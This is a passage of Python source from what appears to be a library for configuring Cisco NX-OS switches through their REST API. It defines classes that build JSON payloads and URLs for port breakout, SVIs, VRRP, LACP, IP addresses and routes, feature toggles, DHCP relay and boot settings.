self.id = id
self.map = map
self.object = 'imFpP'
self._session = session
self._parent = parent
def get_json(self):
return {self.object : {'attributes' : self._get_attributes()}}
def _get_attributes(self):
att = {}
if not self.id:
raise AttributeError('Port id required')
att['id'] = self.id
att['breakoutMap'] = self.map
return att
def get(self, port=None, session=None):
if not session:
session = self._session
query_url = ('/api/mo/sys/breakout/module-%s.json?query-target'
'=children' % (self._parent.module_num))
ret = []
ports = session.get(query_url).json()['imdata']
for port in ports:
id = str(port['imFpP']['attributes']['id'])
map = str(port['imFpP']['attributes']['breakoutMap'])
ret.append(BreakoutPort(id, map, session=session))
return ret
class BreakoutModule(BaseNXObject):
"""
This class defines breakout modules
"""
def __init__(self, module_num=None, session=None, parent=None):
if not module_num:
raise TypeError('Module id expected')
super(BreakoutModule, self).__init__(name=module_num)
self._session = session
self._parent = parent
self.module_num = module_num
self.object = 'imMod'
self.ports = BreakoutPort(session=session, parent=self)
def add_port_map(self, id=None, map=None):
"""
        :param id: String representing the port id (example: 1, 45, etc.)
:param map: String map (Example: 10g-4x)
"""
if not isinstance(map, str):
raise TypeError('str instance is expected for map')
try:
int(id)
except ValueError:
raise ValueError('Invalid port Id')
self._children.append(BreakoutPort(id, map))
def _get_attributes(self):
att = {}
att['id'] = self.module_num
return att
def get_json(self):
return super(BreakoutModule,
self).get_json(self.object,
attributes=self._get_attributes())
def get(self, module_num=None, session=None):
"""
        Get breakout module info
        :param module_num: String representing the module number
        :param session: Session object used for communicating with switch
        :return: List of BreakoutModule objects
"""
if not session:
session = self._session
if module_num:
query_url = '/api/mo/sys/breakout/module-%s.json' % (module_num)
else:
query_url = '/api/mo/sys/breakout.json?query-target=children'
modules = session.get(query_url).json()['imdata']
ret = []
for module in modules:
if module.get('imMod'):
module_num = str(module['imMod']['attributes']['id'])
ret.append(BreakoutModule(module_num, session=session))
return ret
class InterfaceBreakout(BaseNXObject):
"""
This class defines Interface Breakout
"""
def __init__(self, session=None):
super(InterfaceBreakout, self).__init__(name='')
self._session = session
self.object = 'imBreakout'
# id (1) passed here does not make any impact
self.modules = BreakoutModule('1', session=session, parent=self)
def add_module(self, module):
if not isinstance(module, BreakoutModule):
raise TypeError('BreakoutModule instance expected')
self._children.append(module)
def get_json(self):
return super(InterfaceBreakout, self).get_json(self.object)
def get_url(self, fmt='json'):
return '/api/mo/sys/breakout.' + fmt
def get_delete_url(self, module=None, port=None):
return '/api/mo/sys/breakout/module-%s/fport-%s.json' % (module, port)
@classmethod
def get(cls, session=None, module=None, port=None):
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
return InterfaceBreakout(session)
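# Usage sketch (illustrative only): break one front-panel port out into 4x10G.
# The module/port numbers and breakout map are arbitrary, and the sketch
# assumes BaseNXObject.get_json() serializes the attached BreakoutModule and
# BreakoutPort children; only JSON is produced here.
def _example_breakout_payload(session):
    """Return (url, json) for a 10g-4x breakout on module 1, port 1."""
    breakout = InterfaceBreakout(session)
    module = BreakoutModule('1', session=session)
    module.add_port_map('1', '10g-4x')
    breakout.add_module(module)
    return breakout.get_url(), breakout.get_json()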
class SVI(BaseNXObject):
"""
This class defines SVI
"""
def __init__(self, vlan=None, admin_st=None, descr=None):
if not vlan:
raise TypeError('Proper vlan name expected')
try:
            # A dummy line which raises an error if vlan is not in
            # vlan<ID> format
int(vlan.replace('vlan', ''))
except ValueError:
raise AttributeError('Proper vlan name expected')
super(SVI, self).__init__(name=vlan)
self.id = vlan #vlan id
self.if_name = vlan
self.descr = descr
self.admin_st = admin_st
self.mtu = None
self.bw = None
self.object = 'sviIf'
def set_bw(self, bw=None):
self.bw = bw
def set_mtu(self, mtu=None):
self.mtu = mtu
def get_mtu(self):
return self.mtu
def get_bw(self):
return self.bw
def get_url(self, fmt='json'):
return '/api/mo/sys/intf/svi-[%s].%s' % (self.id, fmt)
def get_delete_url(self, vlan=None):
return '/api/mo/sys/intf/svi-[%s].json' % (vlan)
def _get_attributes(self):
att = {}
att['id'] = self.id
if self.admin_st:
att['adminSt'] = self.admin_st
if self.descr:
att['descr'] = self.descr
if self.mtu:
att['mtu'] = self.mtu
if self.bw:
att['bw'] = self.bw
return att
def get_json(self):
return super(SVI, self).get_json(self.object,
attributes=self._get_attributes())
@classmethod
def get(cls, session=None, vlan=None):
"""
Get SVI details
        :param session: Session instance to communicate with switch
        :param vlan: String representing the svi id, e.g. vlan10
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if vlan:
query_url = '/api/mo/sys/intf/svi-[%s].json' % (vlan)
else:
query_url = '/api/node/class/sviIf.json'
svis = session.get(query_url).json()['imdata']
resp = []
for svi in svis:
admin_st = str(svi['sviIf']['attributes']['adminSt'])
id = str(svi['sviIf']['attributes']['id'])
mtu = str(svi['sviIf']['attributes']['mtu'])
desc = str(svi['sviIf']['attributes']['descr'])
bw = str(svi['sviIf']['attributes']['bw'])
svi_obj = SVI(id, admin_st, desc)
svi_obj.set_mtu(mtu)
svi_obj.set_bw(bw)
resp.append(svi_obj)
return resp
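# Usage sketch (illustrative only): define an SVI for VLAN 10 and produce the
# payload that would configure it. The admin state, description and MTU are
# arbitrary example values.
def _example_svi_payload():
    """Return (url, json) for an SVI on vlan10 with a custom MTU."""
    svi = SVI('vlan10', admin_st='up', descr='example SVI')
    svi.set_mtu('9216')
    return svi.get_url(), svi.get_json()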
class ConfigInterfaces(BaseNXObject):
"""This class is used to configure multiple interfaces/svi/port channel
at a time.
"""
def __init__(self, session=None):
super(ConfigInterfaces, self).__init__(name='')
self.object = 'interfaceEntity'
def add_interface(self, interface=None):
"""Form the list of interfaces to be configured"""
if not isinstance(interface, Interface):
raise TypeError('Interface instance is expected')
self._children.append(interface)
def add_svis(self, svi=None):
"""Form list of SVIs"""
if not isinstance(svi, SVI):
raise TypeError('SVI instance expected')
self._children.append(svi)
def add_port_channel(self, pc=None):
"""Form list of PortChannel"""
if not isinstance(pc, PortChannel):
raise TypeError('PortChannel instance expected')
self._children.append(pc)
def get_url(self, fmt='json'):
return '/api/node/mo/sys/intf.json'
def get_json(self):
return super(ConfigInterfaces, self).get_json(self.object,
attributes={})
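# Usage sketch (illustrative only): batch two SVIs into a single payload. The
# vlan ids are arbitrary, and the sketch assumes BaseNXObject.get_json()
# serializes the children added above; nothing is sent to a switch here.
def _example_bulk_svi_payload():
    """Return (url, json) configuring vlan20 and vlan30 in one request."""
    config = ConfigInterfaces()
    config.add_svis(SVI('vlan20', admin_st='up'))
    config.add_svis(SVI('vlan30', admin_st='up'))
    return config.get_url(), config.get_json()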
class VrrpID(object):
"""
This class defines VRRP ID
"""
def __init__(self, vrrp_id=None, secondary_ip=None, session=None,
parent=None):
if not vrrp_id:
raise TypeError('vrrp_id is not provided')
#VRRP ID interface object
self.object = 'vrrpId'
self.vrrp_id = vrrp_id
self.admin_st = None
self.priority = None
self._primary_ip = None
self.interface = None
#VRRP Secondary object
self.child_object = 'vrrpSecondary'
self._secondary_ip = secondary_ip
self._session= session
self._parent = parent
def set_admin_st(self, admin_st=None):
self.admin_st = admin_st
def get_admin_st(self):
"""
:returns: admin state object
"""
return self.admin_st
def set_priority(self, priority=None):
self.priority = priority
def get_priority(self):
"""
:returns: priority object
"""
return self.priority
def set_primary(self, primary_ip=None):
self._primary_ip = primary_ip
def get_primary(self):
"""
:returns: primary ip object
"""
return self._primary_ip
def set_secondary(self, secondary_ip=None):
self._secondary_ip = secondary_ip
def get_secondary(self):
"""
:returns: secondary ip object
"""
return self._secondary_ip
def set_interface(self, interface):
self.interface = interface
def get_interface(self):
return self.interface
def _get_attributes(self):
att = {}
if self.vrrp_id:
att['id'] = self.vrrp_id
if self.admin_st:
att['adminSt'] = self.admin_st
if self.priority:
att['priCfg'] = self.priority
if self._primary_ip:
att['primary'] = self._primary_ip
return att
def _get_child_attributes(self):
child = []
if self._secondary_ip:
child.append({self.child_object:
{"attributes":
{'secondary': self._secondary_ip}}})
return child
def get_json(self):
return {self.object : { "attributes" : self._get_attributes(),
"children" : self._get_child_attributes()}}
class Vrrp(BaseNXObject):
"""
This defines the VRRP Interface
"""
def __init__(self, interface=None, session=None, parent=None,
vrrp_id=None):
super(Vrrp, self).__init__(name="vrrp_interface")
if not interface:
raise TypeError('interface is not provided')
# Base VRRP interface object
self.object = 'vrrpInterface'
self.interface = interface
self.admin_st = None
self.descr = None
self._session = session
self._parent = parent
# id ('1') passed here does not make any impact
self.vrrp_id = VrrpID('1', session=session, parent=self)
self.vrrp_ids = []
def set_admin_st(self, admin_st=None):
self.admin_st = admin_st
def get_admin_st(self):
"""
:returns: admin state object
"""
return self.admin_st
def set_descr(self, descr=None):
self.descr = descr
def get_descr(self):
"""
:returns: description object
"""
return self.descr
def add_vrrp_id(self, vrrp_id=None):
if isinstance(vrrp_id, VrrpID):
self._children.append(vrrp_id)
self.vrrp_ids.append(vrrp_id)
def _get_attributes(self):
att = {}
if self.interface.if_name:
att['id'] = self.interface.if_name
if self.admin_st:
att['adminSt'] = self.admin_st
if self.descr:
att['descr'] = self.descr
return att
def get_json(self):
"""
:returns: json response object
"""
return super(Vrrp, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
def get_url(self, fmt='json'):
"""
:returns: url object
"""
return '/api/node/mo/sys/vrrp/inst.' + fmt
def get_delete_url(self):
"""
        :return: URL to delete the specific interface
"""
return '/api/node/mo/sys/vrrp/inst/if-[%s].xml' % (self.interface.if_name)
@classmethod
def get(self, session=None, interface_str=None):
"""
:param session: Session object to communicate with Switch
:return Vrrp object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
ret_data = []
object = 'vrrpInterface'
if interface_str:
query_url = '/api/node/mo/sys/vrrp/inst/if-['+interface_str+'].json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
else:
query_url = '/api/node/mo/sys/vrrp/inst.json?rsp-subtree=full'
data = session.get(query_url).json()['imdata'][0]
resp = data['vrrpInst']['children']
for ret in resp:
            interface = ret[object]['attributes']['id']
admin_st = ret[object]['attributes']['adminSt']
descr = ret[object]['attributes']['descr']
vrrp = Vrrp(interface=interface)
if ret[object].get('children'):
for id in ret[object].get('children'):
vrrp_id = id['vrrpId']['attributes']['id']
admin_st = id['vrrpId']['attributes']['adminSt']
priority = id['vrrpId']['attributes']['priCfg']
primary_ip = id['vrrpId']['attributes']['primary']
vrrp_id = VrrpID(vrrp_id=vrrp_id)
vrrp_id.set_admin_st(admin_st)
vrrp_id.set_priority(priority)
vrrp_id.set_primary(primary_ip)
vrrp_id.set_secondary('-')
if id['vrrpId'].get('children'):
for sec in id['vrrpId']['children']:
sec_ip = sec['vrrpSecondary']['attributes']['secondary']
vrrp_id.set_secondary(sec_ip)
vrrp.add_vrrp_id(vrrp_id)
vrrp.set_admin_st(admin_st)
vrrp.set_descr(descr)
ret_data.append(vrrp)
return ret_data
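# Usage sketch (illustrative only): build a VRRP group payload for an SVI.
# The group id and addresses are arbitrary; the interface only needs an
# 'if_name' attribute, so an SVI instance is used, and the sketch assumes
# BaseNXObject.get_json() serializes the attached VrrpID children.
def _example_vrrp_payload():
    """Return (url, json) for VRRP group 10 on vlan10."""
    vrrp = Vrrp(interface=SVI('vlan10'))
    group = VrrpID('10')
    group.set_priority('100')
    group.set_primary('192.168.10.1')
    vrrp.add_vrrp_id(group)
    return vrrp.get_url(), vrrp.get_json()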
class ConfigVrrps(BaseNXObject):
"""
This is the base class to configure multiple VRRP Interface classes
"""
def __init__(self, session=None):
super(ConfigVrrps, self).__init__(name='')
self._session = session
self.object = 'vrrpInst'
# id ('1') passed here does not make any impact
self.vrrp_id = VrrpID('1', session=session, parent=self)
# interface ('1') passed here does not make any impact
self.vrrp = Vrrp('1', session=session, parent=self)
def add_vrrp(self, module):
if not isinstance(module, Vrrp):
            raise TypeError('Vrrp instance expected')
self._children.append(module)
def get_url(self, fmt='json'):
"""
:returns: url object
"""
return '/api/node/mo/sys/vrrp/inst.' + fmt
def get_json(self):
"""
:returns: json response object
"""
return super(ConfigVrrps, self).get_json(self.object)
@classmethod
def get(cls, session=None):
"""
:param session: Session object to communicate with Switch
:return ConfigVrrps object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
return ConfigVrrps(session)
class Lacp(BaseNXObject):
"""
This class defines lacp configuration
"""
def __init__(self, rate=None, interface=None, session=None,
parent=None):
super(Lacp, self).__init__(name='')
self._session= session
self._parent = parent
self.rate = rate
self.interface = interface
self.object = 'lacpIf'
@classmethod
    def get(cls, session=None, interface=None):
"""
:param session: Session object to communicate with Switch
:return Lacp object
"""
if interface:
query_url = ('/api/node/mo/sys/lacp/inst/if-['+interface+'].'
'json?query-target=self')
else:
query_url = ('/api/node/mo/sys/lacp/inst.json?query-'
'target=children')
ret_data = []
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
resp = session.get(query_url).json()['imdata']
for ret in resp:
rate = ret['lacpIf']['attributes']['txRate']
interface = ret['lacpIf']['attributes']['id']
lacp = Lacp(rate=rate, interface=interface)
ret_data.append(lacp)
return ret_data
def _get_attributes(self):
att = {}
att['txRate'] = self.rate
att['id'] = self.interface.if_name
return att
def get_url(self):
return '/api/node/mo/sys/lacp/inst.json?query-target=children'
def get_json(self):
return super(Lacp, self).get_json(self.object,
attributes=self._get_attributes())
class IPInterface(BaseNXObject):
"""
This class defines IP (v4/v6) of an interface.
"""
def __init__(self, if_name, session=None, parent=None):
"""
:param if_name: String representing interface i.e. eth1/2
        :param session: Session instance
:param parent: parent class instance
"""
if not isinstance(if_name, str):
raise TypeError('str instance expected')
self._session = session
self.parent = parent
self.interface = if_name
self.obj_name = 'ip%sIf' % (parent.version)
self._addresses = []
self.if_name = if_name
        self.admin_st = None
        self.descr = None
        self.link_local_addr = None
if parent.version == 'v4':
self.acl = None
self.dir_broadcast = None
super(IPInterface, self).__init__(name=self.if_name)
def get_if_name(self):
return self.if_name
def set_admin_st(self, state):
self.admin_st = state
def get_admin_st(self):
return self.admin_st
def get_descr(self):
return self.descr
def set_descr(self, desc):
self.descr = desc
def add_address(self, addr):
self._addresses.append(addr)
def get_address(self):
return self._addresses
def _set_dir_broadcast(self, status):
self.dir_broadcast = status
def _set_acl(self, acl_name):
self.acl = acl_name
def _get_attributes(self):
att = {}
if self.admin_st:
att['adminSt'] = self.admin_st
if self.descr:
att['descr'] = self.descr
att['id'] = self.if_name
if self.parent.version == 'v4' and self.acl and self.dir_broadcast:
att['acl'] = self.acl
att['directedBroadcast'] = self.dir_broadcast
return att
def _get_json(self, class_obj, att=None):
if not att:
att = {}
return {class_obj : {'attributes' : att}}
def set_link_local_addr(self, addr):
self.link_local_addr = addr
def get_json(self):
resp = super(IPInterface,
self).get_json(self.obj_name,
attributes=self._get_attributes())
addrs = []
for addr in self._addresses:
att = {'addr': addr}
addrs.append(self._get_json('ip%sAddr' % (self.parent.version),
att))
if self.link_local_addr:
att = {'addr': self.link_local_addr}
addrs.append(self._get_json('ip%sLLaddr' % (self.parent.version),
att))
resp[self.obj_name]['children'] = addrs
return resp
def get_url(self, fmt='json'):
return ('/api/node/mo/sys/ip%s/inst/dom-default/if-[%s].%s'
                % (self.parent.version, self.if_name, fmt))
def get(self, session=None):
"""
        This method is used from the get() method of the IP class
        :param session: Session instance
"""
if not session:
session = self._session
query_url = ('/api/node/mo/sys/ip%s/inst/dom-default/if-[%s].json'
'?query-target=children' % (self.parent.version,
self.if_name))
resp = session.get(query_url).json()['imdata']
ipaddr = 'ip%sAddr' % (self.parent.version)
ipladdr = 'ip%sLLaddr' % (self.parent.version)
for addr in resp:
if addr.get(ipaddr):
address = str(addr[ipaddr]['attributes']['addr'])
self.add_address(address)
if addr.get(ipladdr):
self.link_local_addr = str(addr[ipladdr]['attributes']
['addr'])
self.add_address(self.link_local_addr)
class IPNextHop(object):
"""This class defines IP(v4/v6) nexthop"""
def __init__(self, addr, interface, vrf, track_id, tag, parent):
self.addr = addr
self.i_face = interface
self.vrf = vrf
self.track_id = track_id
self.tag = tag
self.object = 'ip%sNexthop' % (parent.version)
def _get_attributes(self):
att = {}
att['nhAddr'] = self.addr
if self.i_face:
att['nhIf'] = self.i_face
if self.vrf:
att['nhVrf'] = self.vrf
if self.track_id:
att['object'] = self.track_id
if self.tag:
att['tag'] = self.tag
return att
def get_json(self):
return {self.object : { 'attributes': self._get_attributes()}}
class IPRoute(BaseNXObject):
"""
This class defines Ip (v4/v6) Route
"""
def __init__(self, prefix, version='v4', name='', parent=None, session=None):
self._session = session
self._parent_cls = parent
if version.lower() not in ['v4', 'v6']:
raise TypeError('Ip version not supported')
self.version = version
if not IP.is_valid_ip(prefix.split('/')[0], self.version):
raise TypeError('Invalid prefix')
super(IPRoute, self).__init__(name=name, parent=parent)
self.prefix = prefix
self.object = 'ip%sRoute' % (self.version)
self.next_hops = []
def get_delete_url(self, domain='default'):
"""
This method has to be called after adding IPRoute instance in IP class
:param fmt: String can be json or xml
:return url: String url to delete the ip/ipv6 route
"""
return ('/api/node/mo/sys/ipv4/inst/dom-%s/rt-[%s].json' % (domain,
self.prefix))
def get_json(self):
return super(IPRoute, self).get_json(self.object,
attributes=self._get_attributes())
def _get_attributes(self):
att = {}
att['prefix'] = self.prefix
return att
def add_next_hop(self, addr, interface=None, vrf=None, track_id=None,
tag=None):
if not IP.is_valid_ip(addr, self.version):
raise TypeError('Invalid prefix for IP' + self.version)
if not isinstance(interface, (Interface, PortChannel)):
raise TypeError('Interface or PortChannel instance expected')
if not vrf:
vrf = 'default'
next_hop = IPNextHop(addr, interface.if_name, vrf, track_id, tag, self)
self._children.append(next_hop)
self.next_hops.append(interface)
def get(self, session=None):
""""
Get all the nexthop details from the switch and form a list of
nexthops and store it in self.next_hops list
:param session: Session object to communicate with Switch
:return None
"""
if not isinstance(session, Session):
session = self._session
query_url = '/api/node/mo/sys/ip%s/inst/dom-%s/rt-[%s].json?query-target=children' %\
(self.version, self._parent_cls.domain, self.prefix)
resp = session.get(query_url).json()['imdata']
        ipnexthop = 'ip%sNexthop' % (self.version)
for n_hop in resp:
if n_hop.get(ipnexthop):
addr = n_hop[ipnexthop]['attributes']['nhAddr']
i_face = n_hop[ipnexthop]['attributes']['nhIf']
vrf = n_hop[ipnexthop]['attributes']['nhVrf']
track_id = n_hop[ipnexthop]['attributes']['object']
tag = n_hop[ipnexthop]['attributes']['tag']
next_hop = IPNextHop(addr, i_face, vrf, track_id, tag, self)
self.next_hops.append(next_hop)
class IP(BaseNXObject):
"""
This class defines IP (both v4 and v6)
"""
def __init__(self, version='v4', domain='default', session=None, parent=None):
"""
:param version: String represent ip version
        :param domain: String representing the domain name
:param session: Session instance used for communicating with switch
:param parent: parent class of this class
"""
self._session = session
self._parent = parent
if version.lower() not in ['v4', 'v6']:
raise TypeError('IP version is not supported')
self.version = version.lower()
super(IP, self).__init__(name=domain)
self.i_faces = []
self.cls_object = 'ip%sDom' % (self.version)
self.domain = domain
self.interfaces = []
self.routes = []
def get_url(self, fmt='json'):
return '/api/node/mo/sys/ip%s/inst/dom-%s.%s' % (self.version,
self.domain, fmt)
def get_delete_url(self, i_face, fmt='json'):
return '/api/node/mo/sys/ip%s/inst/dom-%s/if-[%s].%s' % (self.version,
self.domain, i_face, fmt)
def _get_attributes(self):
att = {}
att['name'] = self.domain
return att
@classmethod
def is_valid_ip(cls, address, version):
try:
if version == 'v6':
socket.inet_pton(socket.AF_INET6, address)
elif version == 'v4':
socket.inet_pton(socket.AF_INET, address)
except socket.error: # not a valid address
return False
return True
def enable_directed_broadcast(self, interface, acl=""):
"""
This method enables the ip directed broadcast on the interface
:param interface: An Interface instance
:param acl: String representing acl name
:return None
"""
if self.version != 'v4':
raise TypeError("Directed broadcast is not supported in IPv6")
if not isinstance(interface, (Interface, PortChannel)):
raise TypeError('Interface or PortChannel instance expected')
if interface.if_name in self.i_faces:
for ip_int in self._children:
ip_int._set_dir_broadcast('enabled')
ip_int._set_acl(acl)
else:
ip_int = IPInterface(interface.if_name, parent=self)
ip_int._set_dir_broadcast('enabled')
ip_int._set_acl(acl)
self._children.append(ip_int)
self.i_faces.append(interface.if_name)
def disable_directed_broadcast(self, interface):
"""
Disable ip directed broadcast
:param interface: Interface instance
:return None
"""
if self.version != 'v4':
raise TypeError("Directed broadcast is not supported in IPv6")
if not isinstance(interface, (Interface, PortChannel)):
raise TypeError('Interface or PortChannel instance expected')
if interface.if_name in self.i_faces:
for ip_int in self._children:
ip_int._set_dir_broadcast('disabled')
def add_interface_address(self, interface, addr, link_local=None):
"""
:param interface: Interface instance
:param addr: String representing IP address
:param link_local: String representing link local address
(only for ipv6)
"""
if self.version == 'v4' and link_local:
raise TypeError('Link local is not applicable for ipv4')
if not isinstance(interface, (Interface, PortChannel, SVI)):
raise TypeError('Interface or PortChannel instance expected')
if not IP.is_valid_ip(addr.split('/')[0], self.version):
raise TypeError('Invalid IP%s address' % (self.version))
if link_local and not IP.is_valid_ip(link_local, self.version):
raise TypeError('Invalid link local')
if interface.if_name in self.i_faces:
for ip_int in self._children:
if ip_int.if_name == interface.if_name:
ip_int.add_address(addr)
if link_local:
ip_int.set_link_local_addr(link_local)
else:
ip_int = IPInterface(interface.if_name, parent=self)
if link_local:
ip_int.set_link_local_addr(link_local)
ip_int.add_address(addr)
self._children.append(ip_int)
self.i_faces.append(interface.if_name)
def add_route(self, route):
"""
Add route capability to the configuration
:param route: IPRoute instance
:return None
"""
if not isinstance(route, IPRoute):
raise TypeError('IPRoute instance expected')
if route.version != self.version:
raise TypeError('IP Version mismatch')
self._children.append(route)
self.routes.append(route)
def get_json(self):
return super(IP, self).get_json(self.cls_object,
attributes=self._get_attributes())
@classmethod
def get(cls, session, version='v4', interface=None, domain=None):
"""
Get IP details (interface and route)
        :param session: Session instance to communicate with switch
:param version: This method works based on version
:param interface: String represents interface i.e. ethx/y
:param domain: String representing domain name
:return IP object after storing interface and route details
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
        version = version.lower()
        if version not in ['v4', 'v6']:
            raise TypeError('IP version not supported')
if not domain:
domain = 'default'
if interface:
if 'eth' not in interface:
raise TypeError('Not a valid interface')
query_url = ('/api/node/mo/sys/ip%s/inst/dom-%s/if-[%s].json'
% (version, domain, interface))
else:
query_url = ('/api/node/mo/sys/ip%s/inst/dom-%s.json?'
'query-target=children' % (version, domain))
resp = session.get(query_url).json()['imdata']
ip = IP(version, domain)
ip_if = 'ip%sIf' % (version)
ip_route = 'ip%sRoute' % (version)
for ifs in resp:
if ifs.get(ip_if):
attr = ifs[ip_if]['attributes']
ret_int = IPInterface(str(attr['id']), session=session, parent=ip)
if version == 'v4':
ret_int._set_acl(str(attr['acl']))
ret_int._set_dir_broadcast(str(attr['directedBroadcast']))
ret_int.set_admin_st(str(attr['adminSt']))
ret_int.set_descr(str(attr['descr']))
ret_int.get()
ip.interfaces.append(ret_int)
if ifs.get(ip_route):
attr = ifs[ip_route]['attributes']
prefix = str(attr['prefix'])
route = IPRoute(prefix, version=version, parent=ip,
session=session)
route.get()
ip.routes.append(route)
return ip
class FeatureAttributes(object):
"""
    This class defines the attributes of a specific feature
"""
def __init__(self, feature=None, session=None, parent=None):
self._session= session
self._parent = parent
self.admin_st = None
self.instance = None
if feature:
self.name = feature.lower()[2:]
self.object = 'fm' + feature.title().replace('-','')
def set_admin_st(self, admin_st):
self.admin_st = admin_st
def get_admin_st(self):
return self.admin_st
def set_instance(self, instance):
self.instance = instance
def get_instance(self):
return self.instance
def _get_attributes(self):
att = {}
if self.admin_st:
att['adminSt'] = self.admin_st
return att
def get_json(self):
return {self.object : { "attributes" : self._get_attributes()}}
class Feature(BaseNXObject):
"""
This defines the feature class
"""
def __init__(self, session=None, parent=None):
super(Feature, self).__init__(name="feature")
self._session = session
self._parent = parent
# Base feature object
self.object = 'fmEntity'
def enable(self, feature):
feature_obj = FeatureAttributes(feature)
feature_obj.set_admin_st('enabled')
self._children.append(feature_obj)
def disable(self, feature):
feature_obj = FeatureAttributes(feature)
feature_obj.set_admin_st('disabled')
self._children.append(feature_obj)
def get_json(self):
return super(Feature, self).get_json(self.object)
def get_url(self, fmt='json'):
return '/api/mo/sys/fm.' + fmt
def get(self, session=None):
"""
:param session: Session object to communicate with Switch
:return List of Feature objects
"""
if not session:
session = self._session
query_url = '/api/mo/sys/fm.json?rsp-subtree=full'
ret_data = []
resp = session.get(query_url).json()['imdata']
for ret in resp:
children = ret[self.object]['children']
for child in children:
for key in child:
admin_st = child[key]['attributes']['adminSt']
instance = child[key]['attributes']['maxInstance']
feature = FeatureAttributes(key)
feature.set_admin_st(admin_st)
feature.set_instance(instance)
ret_data.append(feature)
return ret_data
class DhcpRelay(object):
"""
This defines the DHCPRelay
"""
def __init__(self, interface=None, session=None, parent=None):
# DhcpRelay object
self.object = 'dhcpRelayIf'
self.interface = interface
#DhcpRelayAddr object
self.child_object = 'dhcpRelayAddr'
self._session= session
self._parent = parent
self.relay_address = []
self.vrf_name = []
def add_relay_address(self, relay, vrf='!unspecified'):
if not relay:
raise TypeError('relay ip address not specified')
self.relay_address.append(relay)
self.vrf_name.append(vrf)
def _get_attributes(self):
att = {}
if self.interface:
att['id'] = self.interface
return att
def _get_child_attributes(self):
child = []
for (address, vrf) in zip(self.relay_address, self.vrf_name):
att = {self.child_object: {"attributes":
{'address': address,
'vrf': vrf}}}
child.append(att)
return child
def get_json(self):
return {self.object : { "attributes" : self._get_attributes(),
"children" : self._get_child_attributes()}}
def get_delete_url(self, interface, fmt='json'):
return '/api/node/mo/sys/dhcp/inst/relayif-[%s].%s' % (interface, fmt)
class Dhcp(BaseNXObject):
"""
This defines the DHCP
"""
def __init__(self, session=None, parent=None):
super(Dhcp, self).__init__(name="dhcp")
# Base Dhcp object
self.object = 'dhcpInst'
self.v4relay_st = None
self.v6relay_st = None
self._session = session
self._parent = parent
self.dhcp_relays = []
def set_v4relay_st(self, v4relay_st=None):
self.v4relay_st = v4relay_st
def get_v4relay_st(self):
return self.v4relay_st
def set_v6relay_st(self, v6relay_st=None):
self.v6relay_st = v6relay_st
def get_v6relay_st(self):
return self.v6relay_st
def _get_attributes(self):
att = {}
if self.v4relay_st:
att['v4RelayEnabled'] = self.v4relay_st
if self.v6relay_st:
att['v6RelayEnabled'] = self.v6relay_st
return att
def add_relay(self, relay=None):
if isinstance(relay, DhcpRelay):
self._children.append(relay)
self.dhcp_relays.append(relay)
def get_json(self):
"""
:returns: json response object
"""
return super(Dhcp, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
def get_url(self):
"""
:returns: url object
"""
return '/api/node/mo/sys/dhcp/inst.json'
@classmethod
    def get(cls, session=None, version=None):
"""
:param session: Session object to communicate with Switch
:return List containing DHCP object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
ret_data = []
object = 'dhcpInst'
query_url = '/api/node/mo/sys/dhcp/inst.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
dhcp = Dhcp()
for ret in resp:
            v4relay_st = ret[object]['attributes']['v4RelayEnabled']
dhcp.set_v4relay_st(v4relay_st)
v6relay_st = ret[object]['attributes']['v6RelayEnabled']
dhcp.set_v6relay_st(v6relay_st)
if ret[object].get('children'):
for child in ret[object]['children']:
child_obj = child['dhcpRelayIf']
interface = child_obj['attributes']['id']
dhcp_relay = DhcpRelay(interface=interface)
                    if child_obj.get('children'):
                        for g_child in child_obj['children']:
address = str(g_child['dhcpRelayAddr']
['attributes']['address'])
vrf = str(g_child['dhcpRelayAddr']['attributes']
['vrf'])
if vrf == '!unspecified':
vrf = ''
dhcp_relay.add_relay_address(address, vrf)
if not version:
dhcp.add_relay(dhcp_relay)
                            if version == 'ip' and '.' in address:
                                dhcp.add_relay(dhcp_relay)
                            elif version == 'ipv6' and ':' in address:
dhcp.add_relay(dhcp_relay)
ret_data.append(dhcp)
return ret_data
class BootNxos(BaseNXObject):
"""
This class is used to set boot variable
"""
def __init__(self, image, session=None, parent=None):
"""
:param image: String boot image file name
:param session: Session object to communicate with switch
"""
if not isinstance(image, str):
            raise TypeError('image must be a str instance')
super(BootNxos, self).__init__(name="")
# Base boot object
self.object = 'bootBoot'
self._session = session
self._parent = parent
# boot image object
self.child_object = 'bootImage'
self.sup1 = image
self.sup2 = image
def _get_children_attributes(self):
child = []
att = {}
if self.sup1:
att['sup1'] = 'bootflash:/' + self.sup1 + '.bin'
att['sup2'] = 'bootflash:/' + self.sup2 + '.bin'
child.append({self.child_object : { "attributes" : att}})
return child
def set_sup2(self, sup2):
self.sup2 = sup2
def get_sup2(self):
return self.sup2
def get_json(self):
return super(BootNxos,
self).get_json(obj_class=self.object,
attributes={},
children=self._get_children_attributes())
def get_url(self):
""" Return boot url """
return '/api/node/mo/sys/boot.json'
@classmethod
    def get(cls, session):
"""
:param session: Session object to communicate with Switch
:return BootNxos object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
obj = 'bootBoot'
query_url = '/api/node/mo/sys/boot.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
children = ret[obj]['children']
for child in children:
sup1 = str(child['bootImage']['attributes']['sup1'])
sup2 = str(child['bootImage']['attributes']['sup2'])
boot = BootNxos(sup1)
boot.set_sup2(sup2)
return boot
class RunningToStartUp(object):
"""
    This class defines copying the running config to the startup config
"""
def __init__(self, session=None, parent=None):
self.obj_name = 'topSystemCopyRSLTask'
self.admin_st = 'start'
self.frequency = 'one-shot'
self.status = None
def _get_att(self):
att = {}
att['adminSt'] = self.admin_st
att['freq'] = self.frequency
return att
def set_status(self, status):
self.status = status
def set_admin_st(self, adminst):
self.admin_st = adminst
def set_frequency(self, freq):
self.frequency = freq
@classmethod
def _get_lsub(cls):
return 'lsubj-[sys]'
def get_url(self):
return ('/api/mo/sys/action/%s.json' %
